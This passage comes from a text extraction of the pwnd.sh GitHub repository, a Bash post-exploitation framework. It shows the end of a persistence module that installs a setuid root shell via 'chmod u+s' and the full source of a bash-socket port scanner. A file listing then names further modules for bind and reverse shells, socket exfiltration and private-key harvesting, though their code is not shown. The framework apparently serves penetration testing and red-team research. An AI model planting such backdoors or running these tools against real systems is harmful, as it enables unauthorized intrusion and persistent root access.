bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL
is path to where to install the rootshell (default: mktemp -u)
EOF
return 0
}
install_rootshell() {
pwnd_isroot || return 1
local shellfile=${1-$SHELL}
local rootshell=${2-$(mktemp -u)}
cp "$shellfile" "$rootshell"
chmod u+s "$rootshell"
ls -la "$rootshell"
}
pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash"
================================================
FILE: pwnd/reconnaissance/portscanner.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# portscanner, A simple yet "cross platform" implementation of TCP and UDP port scanner using bash sockets
__portscanner_usage() {
cat << "EOF"
usage: portscanner host [port/proto ...], [port-range/proto ...]>
A simple yet "cross platform" implementation of portscanner using bash
sockets. HOST can be IPv4 address or hostname. PORT can be any port number.
PROTO can be `tcp' or `udp'. PORTS is comma-seperated PORTs. PORT-RANGE is
any range between 1 to 65535 following `/tcp' or `/udp' postfix.
Examples:
$ portscanner localhost 80/tcp
This will check if TCP port 80 is open on localhost.
$ portscanner localhost 53/tcp,53/udp
This will check if TCP port 53 and UDP port 53 are opened on localhost.
$ portscanner localhost 1-1024/tcp,69/udp
This will check if TCP ports 1 to 1024 are opened and if UDP port 69
is opened on localhost.
EOF
return 0
}
# TODO: Add alternative implementations for `timeout'-like functionality
__portscanner_timeout() {
# Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time
`perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"`
# `` works better than $() in Linux when it comes to supressing 'Alarm' message _AND_ still having alarm terminating the process
}
# Based on http://www.catonmat.net/blog/tcp-port-scanner-in-bash/
portscanner() {
if [ -z "${2-}" ]; then
__portscanner_usage
return
fi
local host="$1"
local ports=()
local csv_args=()
IFS=',' read -ra csv_args <<< "${@:2}"
for arg in "${csv_args[@]}"; do
case "$arg" in
*-*)
# i.e. 1-1024/tc
local range_ports=()
IFS='/' read -ra range_ports <<< "$arg"
IFS='-' read start end <<< "${range_ports[0]}"
for ((port=start; port <= end; port++)); do
ports+=("$port/${range_ports[1]}")
done
;;
*,*)
# i.e. '53/tcp, 53/udp'
IFS=',' read -ra ports <<< "$arg"
;;
*)
# i.e. '80/tcp'
ports+=("$arg")
;;
esac
done
for port in "${ports[@]}"; do
local conn_parameter=()
IFS='/' read -ra conn_parameter <<< "$port"
__portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" &&
echo "port $port is open" ||
echo "port $port is closed"
done
}
pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets"
gitextract_ydkfa3ea/
├── LICENSE
├── README.rst
├── bin/
│ ├── compile_pwnd_sh.sh
│ └── pwnd.sh
└── pwnd/
├── _bootstrap.bash
├── _pwnd.bash
├── assets/
│ └── priv_keys.bash
├── c2/
│ ├── bindshell.bash
│ └── reverseshell.bash
├── exfiltration/
│ └── over_socket.bash
├── persistence/
│ └── rootshell.bash
└── reconnaissance/
└── portscanner.bash
Condensed preview — 12 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (48K chars).
[
{
"path": "LICENSE",
"chars": 1480,
"preview": "Copyright (c) 2016, SafeBreach\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without "
},
{
"path": "README.rst",
"chars": 1339,
"preview": "PWND.SH\n=======\n\npwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. "
},
{
"path": "bin/compile_pwnd_sh.sh",
"chars": 3526,
"preview": "#!/usr/bin/env bash\n\n###########################################################################\n# "
},
{
"path": "bin/pwnd.sh",
"chars": 7812,
"preview": "#!/usr/bin/env bash\n\nIFS=$' \\t\\n'\n\n\nPWND_VERSION=\"1.0.0\"\n\n\n\n_pwnd_commands=()\n\n\n\npwnd_register_cmd() {\n\t_pwnd_commands+="
},
{
"path": "pwnd/_bootstrap.bash",
"chars": 4362,
"preview": "###########################################################################\n# "
},
{
"path": "pwnd/_pwnd.bash",
"chars": 3196,
"preview": "###########################################################################\n# "
},
{
"path": "pwnd/assets/priv_keys.bash",
"chars": 3485,
"preview": "###########################################################################\n# "
},
{
"path": "pwnd/c2/bindshell.bash",
"chars": 3518,
"preview": "###########################################################################\n# "
},
{
"path": "pwnd/c2/reverseshell.bash",
"chars": 3745,
"preview": "###########################################################################\n# "
},
{
"path": "pwnd/exfiltration/over_socket.bash",
"chars": 3960,
"preview": "###########################################################################\n# "
},
{
"path": "pwnd/persistence/rootshell.bash",
"chars": 3589,
"preview": "###########################################################################\n# "
},
{
"path": "pwnd/reconnaissance/portscanner.bash",
"chars": 5356,
"preview": "###########################################################################\n# "
}
]
About this extraction
This page contains the full source code of the SafeBreach-Labs/pwndsh GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 12 files (44.3 KB), approximately 9.5k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.